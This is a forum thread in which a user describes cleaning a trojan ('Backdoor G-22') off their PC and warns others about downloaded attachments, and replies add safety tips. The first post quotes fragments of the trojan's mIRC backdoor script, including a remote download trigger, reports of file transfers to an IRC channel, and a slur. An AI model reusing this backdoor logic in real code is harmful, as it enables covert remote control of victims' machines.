<HTML>I know what I am doing.
I have been online for a while.
I always follow good computer safety.
Yeah right!

Just a little note to remind you all to NEVER run any programs you get as an email attachment or download from the newsgroups.

I just spent 2 days trying to clean up a Trojan virus I got from a newsgroup download. Was supposed to be an MP3 program.

I ran it without virus checking it first - DOH!
I know better.

It was an especially nasty progam called Backdoor G-22 that even Mcaffe Virus Scan and Norton wouldn't kill. I had to go into my registry and remove all the little bits and pieces of code lying around. It created an "Explorer.exe" and hid it in my Windows\Fonts\ folders. Some of the virus files were disguised as font files like courier.ttf, fonts.ttf, etc.

I finally killed the sucker - but it took a while to figure out all its tricks.

Here is some of the text it writes to your .INI files:

n179= if ($exists(task.exe) == $false) { remini script.ini | remini mirc.ini | notice %connect.chan Oh Shiiiiiiiiiiiit deltree this fucker $ip | halt }
n180= run task.exe /n /fh taskmon
n186=on 1ISCONNECT: { timermakesureconnect 0 20
n188=on *:FILESENT:*.*: {
n189= if (%connect.chan != %mp3channel ) { /notice %connect.chan 4,0Filesent to $nick , $filename, $address, $time Hehe }
n191=on *:FILERCVD:*.*: { /notice %connect.chan 4,0 Filerecieved from $nick , $nopath($filename) , $address, $time $+ . I think its a virus the damn fag }
n192=#####################BACKUP IF I AM KLINED##########################
n193=on *:TEXT:*:*:{
n194= if ($1 == get new variables) { download | msg $nick hi | timergetinserver 1 20 server %server }

I love the little "Hehe }" hidden in there!

Death to viruses!

Practice safe computer sex. Don't let your guard down - and always scan all programs that you get from the net BEFORE you run them.

Take care artisans
kiyotei</HTML>

<HTML>report problems by e-mail .-------- and..........

something happens, together we?ll find the best solution!

however - I?d been infekted by virusses too mostly it had
been hard or software-problems, if not - we?ll find the way to
delete the illness

your

Merlin</HTML>

<HTML>It's done.

Trojan (virus) is dead. System is 100% bug-free.

Using a great firewall now - Free for personal use:
check it out - <a href="[www.zonelabs.com] Alarm</a>

Thanx for the offer of help.

Your eBro -kiyotei</HTML>

<HTML>Never open attatchments (mail and news is the same) with the ending
*.exe *.jpeg.vbs etc.....

run it in the safe sandbox - reading the sourcecoude! of it first!
While not opening/running it by windows!

so you will see what is in it - also word and office macros are a

real problem once one made some of my computers "hardisc c:
not found...

Yes I am using Zonealarm too since some years - good Program
against bombing and sniffing, but - it seems to send back datas
to the softwareproducer like realplayer, being called a kind of
Trojan too...

apal</HTML>